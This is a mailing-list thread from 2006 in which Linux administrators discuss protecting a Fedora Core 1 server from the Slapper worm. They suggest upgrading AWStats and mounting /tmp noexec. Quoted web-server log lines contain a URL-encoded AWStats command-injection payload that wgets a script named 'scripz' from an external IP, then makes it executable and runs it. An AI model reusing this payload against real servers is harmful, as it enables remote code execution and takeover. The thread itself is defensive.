slapper worm

[William Stockall]

I don't remember for sure if this will work, but it may be possible to 
do something like this:

mount --bind /tmp /tmp -o noexec

I think that will now enforce the noexec on /tmp without having to 
create a new partition for tmp.


			Will.

Michael Mansour wrote:
> Hi Kelson,
> 
> 
>>Michael Mansour wrote:
>>
>>>220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
>>>/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
>>>
> 
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> 
>>> HTTP/1.1"
>>> 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>>>220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
>>>/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
>>>
> 
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> 
>>> HTTP/1.1"
>>> 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>>
>>...
>>
>>>Are there any updates FL can do to any of the packages to fix/block
>>>slapper from an FC1 machine?
>>
>>You might also want to make sure you're using a current version of
>>AWStats.  IIRC this flaw was fixed in either 6.3 or 6.4, and the current
>>version is 6.5.
> 
> 
> Yeah, I run awstats 6.5 on that system.
> 
> 
>>(If you don't have awstats.pl on your system, then these lines are 
>>just probes and aren't relevant to your problem.)
>>
>>More generally, I read advice somewhere that mounting /tmp with the 
>>"noexec" option (and making any other temp directories symbolic 
>>links to that one) can make this type of attack much more difficult.
> 
> 
> Definately noted as one of the measures to stop this type of attack, but for
> this particular server, /tmp is not a mounted filesystem but part of /, so I
> can't really do that without re-partitioning the disk and creating a dedicated
> /tmp.
> 
> Thanks.
> 
> Michael.
> 
> --
> fedora-legacy-list mailing list
> fedora-legacy-list at redhat.com
> https://www.redhat.com/mailman/listinfo/fedora-legacy-list